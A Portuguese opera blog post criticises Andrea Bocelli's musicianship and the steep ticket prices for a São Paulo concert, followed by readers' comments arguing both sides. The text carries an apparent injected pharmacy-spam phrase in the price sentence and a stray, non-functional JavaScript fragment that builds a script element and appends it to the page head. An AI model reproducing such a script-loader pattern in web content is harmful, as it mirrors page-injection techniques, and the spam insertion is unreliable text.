Notícia

Mais uma vez, Andrea Bocelli no Brasil

O tenor italiano virá mais uma vez ao Brasil para uma apresentação no próximo dia 13 de Dezembro.

Vai cantar em um lugar recheado de bacanas e endinheirados, o Jockey Club de São Paulo. Quem quiser ver o grande cantor italiano terá que estourar o limite do cartão de crédito, pois o ingresso mais barato custa R$ 290,00 e o mais caro valtex nex day sai por R$ 2350,00.

Bocelli é um produto da mídia, sua voz nunca me empolgou. Sua fórmula de sucesso são gravações de CDs e DVDs com baladas românticas italianas, aqueles que os bons filhos dão as mães no Natal. Grava trechos de óperas e músicas românticas a torto e a direito, mas quando tenta gravar uma ópera completa o resultado é desastroso, como vocês podem ver na crítica da ópera La Bohème, de Puccini, publicada em 2009 no blog de Opera e Ballet.

Os discos de Bocelli são de um tremendo mal gosto e o repertório oscila entre o brega e o clássico. Para aumentar a fama, Bocelli grava com grandes nomes da música internacional como Sarah Brightman e anos atrás, em Belo Horizonte cantou com a “grande cantora brasileira” Sandy. Dessa vez, ele se apresentará com a Orquestra Nacional Ecoro e cantará com o quarteto DIV4s. Eu nem imagino quem sejam.

A eterna discussão de que Bocelli ajuda a divulgar a ópera e atrair novos públicos é papo furado. Bocelli cria público para seu repertório, músicas românticas, assoviáveis, que agradam a toda a família e fazem os sentimentais caírem no choro. Alguém, como sempre, vai me dizer que viu o Bocelli e se apaixonou por ópera e música clássica, isso é a exceção da exceção. Venhamos e convenhamos, o tenor não está nem aí com a ópera e nem tem a obrigação de divulgá-la. Seu negócio é faturar com suas apresentações e a venda de discos.

Ali Hassan Ayache

d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);

11 Comments

  1. Parabéns pela conclusão sucinta e pertinente. Quero ver quem vai ser o grande bobo que vai pagar mais de 2000 reais pra ver isso…

  2. Olha, querido, te garanto que tem muita gente pagando para assistir a esse concerto e a quantos o grande Andrea Bocelli apresentar: além de uma voz magnifica, tem um grande coração que, ao contrário de muita gente, se preocupa com ajudar o próximo.

  3. NAO É DE ESPANTAR, VINDO DE QUEM VIERAM ESSAS PALAVRAS, POIS NO SEU DNA NÃO EXISTE UMA COISA CHAMADA SENSIBILIDADE. NÃO SEI QUEM TE DEU O TÍTULO DE CRÍTICO, POIS, PARA SABER OUVIR MÚSICA E UM CANTOR DE QUALIDADE DA GRANDEZA DE ANDREA BOCELLI, TEM QUE TER UM ESPÍRITO. ISSO É COISA QUE ESTÁ NO SEU SANGUE NÃO TER. VOCÊ É UM SURDO, UMA PENA…..

  4. GOSTARIA DE DIZER QUE ANDREA BOCEELI É E SEMPRE SERÁ O MAIOR TENOR DO MUNDO, NÃO IMPORTANDO QUE AS PESSOAS NÃO TENHAM SENSIBILIDADE PARA OUVI-LO E SENTIR SUA VOZ. UMA PENA QUE PESSOAS AINDA ESTEJAM NA IGNORÂNCIA MUSICAL E ESCREVAM BOBAGENS, PRINCIPALMENTE NÃO RESPEITANDO SEUS FÃS, O PRÓPRIO ANDREA E O TRABALHO LINDO QUE FAZ, NÃO APENAS CANTANDO. LEIA UM POUCO MAIS SOBRE ANDREA BOCELLI ANTES DE ESCREVER BESTEIRA E PUBLICAR PALAVRAS INDEVIDAS QUE SÓ FAZEM FORTALECER NOSSA ADMIRAÇÃO PELO MAIOR CANTOR DO UNIVERSO. SAIA DA IGNRÂNCIA E ENTRE PARA O GRUPO DAS PESSOAS QUE SABEM O QUE SIGNIFICA UMA BELA VOZ E UMA MÚSICA DE QUALIDADE.

  5. Olha, eu concordo também com o ponto de vista apresentado por você Ali Hassan Ayache e por você Yuri Ramos. Quem será o bobo que comprará esses ingressos. A Renée Fleming, grande cantora esteve no Brasil e acredito que os ingressos não foram exorbitantes e estou pensando em técnica, em beleza vocal e outros atributos com exceção do ato de gritar (Bocelli sabe fazê-lo muito bem). E já repararam que ele é a descendência do Pavarotti, só canta músicas italianas já conhecidas pelo público e árias de ópera italianas, mandem-nos videos em que ele cante Schumann, Schubert e dentre outros ou Delibes ou ária antiga.
    Como cantor, nada nada versátil só cópia.

  6. Não estou a favor e nem contra o que o Ali escreveu sobre o Bocelli. Devemos levar em conta a limitação que o cantor possui, no aspecto a performance de ópera.
    De longe, a voz dele não é calorosa como a do saudoso tenor Pavarotti, mas não é questão de qualidade e sim de timbre. Gosto é gosto! Eu gosto muito de ouvir Bocelli, mas creio que para o genero operístico, pouco tem feito mesmo, se preocupando muito com a própria carreira.
    Sua voz, se comparada a de outros grandes tenores do passado, deixa muito a desejar mesmo, em questões de harmônicos. Mas éssa é outra história. Para quem irá assistir, desejo ótimo aproveitamento e muitas felicidades.

  7. Não gostar de ouvir Bocelli é coisa particular do crítico que escreveu. Agora, dizer que não é de boa qualidade, isso é muito mediocre da parte de quem escreveu. Um ótimo entretenimento sim, para quem irá assistir.
    Melhor ver o tenor, do que pagar para ver o Roberto Carlos lamuriando com aquelas canções tristes. Eu concordo em parte que o repertório do Bocelli é muito brega, mas que público ele teria se cantasse somente trechos de óperas?
    Trabalhar em beneficio de uma determinada causa, é para poucos, como o tenor José Carreras que escapou da morte, curado de leucemia e hoje faz muitas obras de caridades e tem a fundação para ajuda da cura da doença em muitos lugares do mundo e até aqui! Cada caso é um caso e cada cabeça uma sentença!!!

  8. De fato, comparado a vozes celebres, como Mario del Monaco, Gigli, Bjorling etc… o Bocelli nao vai nunca se aproximar. Como disse muito bem o Nei, é uma questao de timbre. Tive a oportunidade de ouvi-lo ao vivo na Toscana, Italia, e devo dizer que ao vivo me surpreendeu por de fato uma particularidade não timbrística, mas emocional da voz. Quanto à ópera, isso sim é outra história. Quem profundamente a conhece sabe que até mesmo na atualidade o que deixou de existir nunca mais existirá. Antigamente, a voz era a simbologia “isine qua non” para a ópera, mas tudo mudou. Existem os melhores regentes, os melhores cenários, a melhor fotografia, a melhor orquestra, e não que isso não seja imprescindível, mas assim como o carnaval brasileiro, foi artificializado, acredito que essa discussão vai além do cantor Andrea Bocelli. Enfim, seu repertório de árias de óperas famosas e a mistura do repertório erudito, com a música internacional, e popular algo que de fato é produto da indústria cultural, e de produção que visa sim a fama e o sucesso! Mas isso ao fim grande parte dos artistas tem, ou diria a maioria! A ópera na sua essência sim… é outra história!

  9. Comparar Bocelli ao Pavarotti é uma ofensa a esse último pois a voz do Bocelli não chega aos pés da voz do falecido. Outra coisa, em duas apresentações que fez ao Brasil, lesou a população brasileira. Na primeira vez, embolsou o dinheiro sem fazer o show e, agora, em São Paulo, com a ganância de faturar 25.000 ingressos, fez o show ao ar livre, num local em que muitas pessoas não conseguiram chegar. Vamos fazer um movimento contra este senhor que pensa que a população brasileira é idiota. Queria ver se ele faria isso nos EUA ou na Europa???

  10. Concordo com as críticas, ainda mais agora depois do absurdo que ocorreu no show dele em São Paulo. Agora não se trata mais de avaliar a voz do cantor, mas sim sua conduta profissional. O mínimo que ele deveria ter feito depois do ocorrido dia 13/12/2012 seria sugerir a seus empresários algum tipo de ressarcimento ao público prejudicado. Seria o mínimo que se poderia esperar de uma figura que tenta repassar uma imagem de bom moço.

Leave a Response

Ali Hassan Ayache
Bacharel em Geografia pela USP. Apreciador de ópera, balé e música clássica. Ativo no meio musical, mantém o blog http://verdi.zip.net/. Escreve críticas, divulga eventos, entrevista personalidades e resenha óperas e balés em DVD.